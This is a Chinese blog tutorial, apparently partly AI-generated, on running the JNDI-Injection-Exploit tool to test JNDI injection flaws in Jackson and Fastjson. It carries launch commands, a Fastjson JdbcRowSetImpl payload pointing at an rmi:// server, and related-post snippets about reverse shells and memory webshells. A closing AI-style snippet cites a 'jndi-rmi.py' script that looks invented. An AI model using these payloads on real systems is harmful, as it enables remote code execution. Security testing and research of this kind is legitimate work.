JNDI-Injection-Exploit 使用教程

最新推荐文章于 2025-04-16 09:49:22 发布
最新推荐文章于 2025-04-16 09:49:22 发布
阅读量1.4k 收藏 17
点赞数 13
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_01056/article/details/141008452
版权

JNDI-Injection-Exploit 使用教程

项目地址:https://gitcode.com/gh_mirrors/jn/JNDI-Injection-Exploit

项目介绍

JNDI-Injection-Exploit 是一个用于生成可工作的 JNDI 链接并提供后台服务的工具,通过启动 RMI 服务器、LDAP 服务器和 HTTP 服务器来实现。该工具主要用于测试 JNDI 注入漏洞,如 Jackson、Fastjson 反序列化漏洞等。

项目快速启动

环境准备

确保你已经安装了 Java 环境,并且 JAVA_HOME 环境变量已经正确配置。

下载项目

git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
cd JNDI-Injection-Exploit

启动工具

使用以下命令启动工具:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
  • -C:远程 class 文件中要执行的命令(可选,默认命令是 mac 下打开计算器,即 "open /Applications/Calculator.app"
  • -A:服务器地址,可以是 IP 地址或者域名(可选,默认地址是第一个网卡地址)

示例

启动 JNDI-Injection-Exploit:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe" -A "192.168.1.1"

应用案例和最佳实践

应用案例

JNDI-Injection-Exploit 可以用于以下场景:

  1. 漏洞测试:在开发和测试环境中,使用该工具生成 JNDI 链接,插入到 JNDI 注入相关的 POC 中,验证系统是否存在 JNDI 注入漏洞。
  2. 安全研究:安全研究人员可以使用该工具深入研究 JNDI 注入漏洞的原理和利用方法。

最佳实践

  1. 端口检查:确保 1099、1389、8180 端口可用,不被其他程序占用。如果需要,可以在 ServerStart 类的 26~28 行更改默认端口。
  2. 命令安全:确保传入的命令在 Runtime.getRuntime().exec() 方法中可执行,避免使用危险的系统命令。

典型生态项目

JNDI-Injection-Exploit 可以与以下项目结合使用:

  1. marshalsec:一个用于生成各种序列化漏洞利用 payload 的工具,可以与 JNDI-Injection-Exploit 结合使用,生成更复杂的漏洞利用链。
  2. ysoserial:一个著名的 Java 反序列化漏洞利用工具,可以生成各种反序列化漏洞的 payload,与 JNDI-Injection-Exploit 结合使用,可以扩展漏洞利用的范围。

通过结合这些生态项目,可以更全面地测试和研究 Java 应用的安全性。

JNDI-Injection-Exploit JNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc) JNDI-Injection-Exploit 项目地址: https://gitcode.com/gh_mirrors/jn/JNDI-Injection-Exploit

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
JNDIExploit使用方法
qq_50854662的博客
02-28 5421
JNDIExploit使用方法
JNDI-Injection-Exploit 项目 JDNI注入测试工具
最新发布
M1665487923的博客
04-16 749
当目标系统解析此 JSON 时,会触发 JNDI 查找,加载并执行你通过 JNDI-Injection-Exploit 提供的恶意代码。java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [参数]并启动后端服务(如 RMI、LDAP 和 HTTP 服务器)的工具,主要用于测试和验证。(如 Fastjson、Jackson 等反序列化漏洞)。是一个用于生成可工作的。
JNDI-Injection-Exploit 项目使用教程
gitblog_00727的博客
09-13 1050
JNDI-Injection-Exploit 项目使用教程 JNDI-Injection-Exploit JNDI命令注入利用 项目地址: https://gitcode.com/gh_mirrors/jnd/JNDI-Injec...
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
JNDI漏洞利用 一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用使用说明 使用java -jar JNDIExploit.jar -h查看参数说明,其中--ip参数为必选参数 Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false)
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
12-12
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.zip
JNDI-Injection-Exploit
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 4210
JNDI-Injection-Exploit工具比marshalsec要好用的多,相当于把http服务器和协议服务器放在了一起 github地址 https://github.com/welk1n/JNDI-Injection-Exploit.git 可以下载其release下的安装包 $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。
jndi-JNDI-Injection-Exploit
12-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。 (可选项 , 默认命令是mac下打开计算器,即"open /Applications/Calculator....
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
该压缩包"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"可能包含了一个JNDI注入攻击的示例或者测试工具,"SNAPSHOT"通常表示这是一个开发中的版本,可能尚未经过完整测试,因此可能存在漏洞或不稳定性。使用这样的...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/...
JNDI注入利用工具】JNDIExploit v1.1
qq_21039641的博客
07-04 2712
一款用于JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,集成了JDNI注入格式,能够更加方便的开启服务端后直接利用,支持反弹Shell命令执行、直接植入内存shell等,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用
JNDIExploit-1.2-SNAPSHOT
03-20
JNDIExploit-1.2-SNAPSHOT
JNDIExploit-用于 JNDI注入利用的工具
04-16
一款用于 JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用使用 java -jar JNDIExploit.jar -h 查看参数说明,其中 --ip 参数为必选参数
JNDIExploit.zip
12-14
JNDIExploit
JNDI使用说明
07-29
JNDI使用说明JNDI使用说明JNDI使用说明JNDI使用说明JNDI使用说明JNDI使用说明JNDI使用说明
java asm jndi_JNDI-Injection-Exploit
weixin_29066121的博客
02-16 1442
介绍最近把自己之前写的JNDI注入工具改了一下push到了github,地址:github,启动后这个工具开启了三个服务,包括RMI、LDAP以及HTTP服务,然后生成JNDI链接。测试时可以将JNDI链接插入到JNDI注入相关的POC中,如Jackson、Fastjson反序列化漏洞等。三个服务中,RMI和LDAP基于marshalsec中RMIRefServer、LDAPRefServer类修...
Exploitng JNDI Injection In Java
测试
01-11 686
概要https://www.veracode.com/blog/research/exploiting-jndi-injections-java跟着这文章调了一遍, 之前一度以为在jdk 8u191之后, JNDI注入也就只能打打反序列了,看了这文章后发现了一种新的场景。之前JNDI注入都是依靠于getObjectFactoryFromReference时,如果目标classpath里找不到指定的...
用marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
2301_79837041的博客
04-11 3524
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞。
jndi-injection-exploit使用
03-21
### JNDI注入漏洞的利用方法 JNDI(Java Naming and Directory Interface)是一种用于访问命名和目录服务的应用程序编程接口。当应用程序通过不受信任的数据动态加载远程资源时,可能会引发JNDI注入漏洞。这种漏洞允许攻击者执行恶意代码并控制目标系统。 #### 工具介绍 `JNDI-Injection-Exploit` 是一种专门设计用来测试和验证JNDI注入漏洞的工具[^2]。它能够生成特定的JNDI链接,并启动多个服务器来模拟实际攻击场景中的行为,例如针对Jackson、Fastjson等序列化库中存在的安全问题进行测试。 #### 利用流程概述 为了成功利用该漏洞,通常需要完成以下几个方面的操作: 1. **配置环境**: 需要确保本地开发环境中已经安装好必要的依赖项以及克隆下来的 `JNDI-Injection-Exploit` 仓库文件夹[^4]。 2. **运行脚本初始化RMI/LDAP Server**: 执行相应的Python脚本来设置监听的服务端口。例如,在终端输入如下命令可以启动一个简单的 RMI server: ```bash python3 jndi-rmi.py --port 8089 ``` 3. **构造恶意payloads**: 根据不同的框架特性定制适合的目标应用类型的载荷字符串。这些载荷最终会被嵌套到HTTP请求参数或者JSON对象字段之中传递给受害方解析处理。 4. **发送含有恶意数据包至受害者机器上**: 如果一切正常的话,则应该可以看到由我们自己搭建起来的服务接收到来自对方发起连接尝试的日志记录信息;与此同时如果存在可被触发条件下的反序列化进程的话,那么就有可能实现任意代码执行效果了。 #### 安全防护建议 为了避免遭受此类攻击的影响,开发者应当采取以下措施加强系统的安全性: - 对外部传入的所有变量都应做严格的校验过滤工作; - 尽量减少不必要的功能模块暴露在外网环境下; - 及时更新补丁修复已知的安全隐患版本号差异情况等等[^1]。 ```python import subprocess def start_rmi_server(port=8089): try: result = subprocess.run(['python3', 'jndi-rmi.py', '--port', str(port)], capture_output=True, text=True) print(result.stdout) except Exception as e: print(f"Error occurred while starting the RMI server: {e}") start_rmi_server() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

殷泳娓

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值